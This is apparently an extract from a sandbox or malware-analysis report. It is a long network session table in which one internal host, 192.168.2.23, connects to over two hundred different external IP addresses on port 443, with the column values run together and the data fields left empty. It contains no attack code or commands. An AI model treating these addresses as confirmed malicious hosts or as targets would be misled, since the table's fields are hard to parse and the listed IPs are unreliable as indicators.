                                          22628192.168.2.2342746144.236.65.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22629192.168.2.2341152191.201.232.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22630192.168.2.2345176201.75.253.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22631192.168.2.2344496119.93.70.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22632192.168.2.2345848129.17.46.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22633192.168.2.234652023.186.7.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22634192.168.2.233757435.238.30.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22635192.168.2.235794291.237.194.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22636192.168.2.2335784137.106.54.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22637192.168.2.2350346142.242.190.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22638192.168.2.234706617.148.206.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22639192.168.2.235637082.65.201.80443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22640192.168.2.234457841.252.31.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22641192.168.2.2345726223.204.179.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22642192.168.2.234591483.220.219.204443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22643192.168.2.2333398112.75.246.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22644192.168.2.2344438206.186.55.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22645192.168.2.235998663.176.235.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22646192.168.2.2333818176.41.101.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22647192.168.2.2359820102.81.192.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22648192.168.2.2349432208.145.44.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22649192.168.2.2352584176.233.210.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22650192.168.2.2344090200.3.220.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22651192.168.2.2342654156.192.200.7443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22652192.168.2.2354186101.159.79.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22653192.168.2.2343892184.136.6.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22654192.168.2.2350380126.94.96.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22655192.168.2.234680037.95.192.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22656192.168.2.2345782199.73.217.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22657192.168.2.2346104118.191.183.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22658192.168.2.2349832130.206.224.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22659192.168.2.234167643.254.223.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22660192.168.2.2346330149.175.219.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22661192.168.2.235653690.225.92.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22662192.168.2.2348770222.244.81.117443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22663192.168.2.233286863.119.246.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22664192.168.2.236079479.20.46.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22665192.168.2.235243490.80.254.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22666192.168.2.2358052115.100.95.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22667192.168.2.2350220123.173.155.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22668192.168.2.235089688.156.56.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22669192.168.2.2336100175.241.227.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22670192.168.2.2351598114.26.64.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22671192.168.2.234168454.195.152.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22672192.168.2.233998081.86.252.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22673192.168.2.2338632192.156.53.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22674192.168.2.234366820.216.3.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22675192.168.2.2349234154.87.125.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22676192.168.2.2332974144.97.74.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22677192.168.2.2344594148.227.45.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22678192.168.2.2357018104.33.36.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22679192.168.2.2355108223.51.117.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22680192.168.2.2360328164.246.132.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22681192.168.2.234182642.128.204.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22682192.168.2.2355278137.16.118.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22683192.168.2.234655672.24.218.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22684192.168.2.233323839.173.248.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22685192.168.2.2349176141.4.146.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22686192.168.2.233682494.15.117.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22687192.168.2.233349617.15.129.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22688192.168.2.234599034.10.27.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22689192.168.2.2346466131.5.233.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22690192.168.2.2343698112.136.11.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22691192.168.2.235695481.198.147.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22692192.168.2.2347262212.117.223.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22693192.168.2.2337908102.176.118.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22694192.168.2.2360606109.31.56.116443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22695192.168.2.235294063.9.183.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22696192.168.2.235420644.144.236.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22697192.168.2.2340988100.41.119.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22698192.168.2.2338310205.49.0.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22699192.168.2.236072099.66.78.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22700192.168.2.2346722153.169.223.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22701192.168.2.233759018.228.18.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22702192.168.2.2360192223.118.214.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22703192.168.2.2334456130.211.32.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22704192.168.2.2354538188.199.120.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22705192.168.2.234596249.183.21.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22706192.168.2.2354258175.93.72.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22707192.168.2.2336420157.15.2.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22708192.168.2.235661893.130.14.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22709192.168.2.2335186168.85.73.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22710192.168.2.2345570191.16.99.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22711192.168.2.2340950132.193.124.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22712192.168.2.235923037.152.149.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22713192.168.2.235625887.66.243.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22714192.168.2.2333588155.38.177.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22715192.168.2.2341546151.182.250.196443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22716192.168.2.2353466133.213.119.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22717192.168.2.233611827.132.118.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22718192.168.2.2339732135.147.220.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22719192.168.2.235642863.210.204.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22720192.168.2.2339212216.173.9.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22721192.168.2.235508250.40.213.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22722192.168.2.2344890160.37.96.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22723192.168.2.2348862217.186.42.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22724192.168.2.2340894105.50.172.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22725192.168.2.2360754221.214.146.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22726192.168.2.233784414.49.74.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22727192.168.2.234628063.182.79.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22728192.168.2.2351572136.1.236.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22729192.168.2.235975291.15.117.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22730192.168.2.2334974169.8.151.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22731192.168.2.23459488.45.48.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22732192.168.2.234341027.253.172.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22733192.168.2.2342852150.193.21.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22734192.168.2.2346974213.18.11.101443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22735192.168.2.2333728171.121.244.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22736192.168.2.234672642.159.255.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22737192.168.2.2334220101.219.50.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22738192.168.2.233656659.206.197.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22739192.168.2.2337040220.187.131.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22740192.168.2.2344854116.210.167.92443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22741192.168.2.2342138148.107.73.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22742192.168.2.233476883.78.26.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22743192.168.2.235222618.154.125.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22744192.168.2.2338826209.63.143.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22745192.168.2.234582014.26.190.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22746192.168.2.2347914125.40.179.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22747192.168.2.233758059.224.232.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22748192.168.2.234259023.180.77.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22749192.168.2.2350728151.58.192.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22750192.168.2.234798495.80.193.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22751192.168.2.235264688.3.114.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22752192.168.2.2344312216.70.113.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22753192.168.2.2343084116.124.241.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22754192.168.2.235474850.132.136.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22755192.168.2.234412683.61.161.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22756192.168.2.234151057.13.200.226443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22757192.168.2.2359068112.86.247.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22758192.168.2.2334856124.208.139.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22759192.168.2.2337116182.228.49.45443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22760192.168.2.233600843.100.181.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22761192.168.2.2350100164.219.41.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22762192.168.2.236033292.30.53.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22763192.168.2.2348084122.124.160.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22764192.168.2.2350658112.92.227.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22765192.168.2.2355128136.248.31.92443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22766192.168.2.2356154128.24.97.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22767192.168.2.2353902128.209.147.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22768192.168.2.235305639.15.99.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22769192.168.2.2344316219.238.208.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22770192.168.2.233925842.1.147.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22771192.168.2.233649232.28.17.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22772192.168.2.235748031.75.178.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22773192.168.2.233307470.148.164.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22774192.168.2.2356406135.7.25.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22775192.168.2.2338032123.135.13.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22776192.168.2.235881250.227.76.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22777192.168.2.23425742.121.204.227443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22778192.168.2.2343774128.162.146.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22779192.168.2.234421476.33.76.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22780192.168.2.233375438.43.127.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22781192.168.2.2353536126.156.215.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22782192.168.2.2332778217.1.205.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22783192.168.2.234048065.177.224.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22784192.168.2.236013894.211.79.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22785192.168.2.2334118170.116.85.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22786192.168.2.2350386163.245.74.185443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22787192.168.2.235734872.222.143.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22788192.168.2.2352536101.10.201.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22789192.168.2.2354058195.119.18.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22790192.168.2.233334879.252.214.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22791192.168.2.234307058.197.135.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22792192.168.2.2344990199.133.164.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22793192.168.2.2344212161.242.77.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22794192.168.2.23597329.202.0.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22795192.168.2.23605368.116.230.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22796192.168.2.2342744170.208.84.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22797192.168.2.234284645.153.8.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22798192.168.2.23354948.176.133.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22799192.168.2.2354362105.19.51.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22800192.168.2.2338276147.249.47.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22801192.168.2.2343618100.248.2.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22802192.168.2.235054054.119.59.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22803192.168.2.233592820.53.223.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22804192.168.2.234985880.243.56.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22805192.168.2.234369820.118.40.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22806192.168.2.234891263.252.161.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22807192.168.2.2351978116.99.72.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22808192.168.2.2358828195.167.208.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22809192.168.2.2350064120.233.166.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22810192.168.2.235715294.198.188.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22811192.168.2.2343600133.249.224.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22812192.168.2.2352978145.74.98.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22813192.168.2.2359424114.162.143.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22814192.168.2.2338690146.244.49.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22815192.168.2.235092214.156.202.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22816192.168.2.234595423.149.63.43443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22817192.168.2.2336434219.252.85.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22818192.168.2.2338438143.8.117.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22819192.168.2.234409425.27.243.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22820192.168.2.235489039.255.149.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22821192.168.2.2334624189.204.229.196443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22822192.168.2.2341174123.164.143.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22823192.168.2.2348602187.77.18.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22824192.168.2.2348898156.100.222.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22825192.168.2.2355580121.230.213.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22826192.168.2.2335490192.137.244.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22827192.168.2.2343512198.206.240.142443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22828192.168.2.2348244111.44.147.111443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22829192.168.2.233807065.6.145.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22830192.168.2.235345831.81.133.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22831192.168.2.2344308164.7.92.185443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22832192.168.2.234349261.72.148.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22833192.168.2.2337138166.16.42.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22834192.168.2.233383019.114.119.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22835192.168.2.235835841.166.223.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22836192.168.2.235862873.150.103.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22837192.168.2.2356240208.171.187.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22838192.168.2.2357970220.143.150.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22839192.168.2.2341980163.141.206.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22840192.168.2.234793224.65.182.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22841192.168.2.235636666.55.56.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22842192.168.2.2337944156.61.89.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22843192.168.2.2348514146.69.131.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22844192.168.2.2349086180.135.248.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22845192.168.2.236090880.162.103.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22846192.168.2.235023442.92.87.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22847192.168.2.234140037.50.165.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22848192.168.2.2358994198.9.72.194443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22849192.168.2.2352268194.4.17.150443
                                          TimestampBytes transferredDirectionData


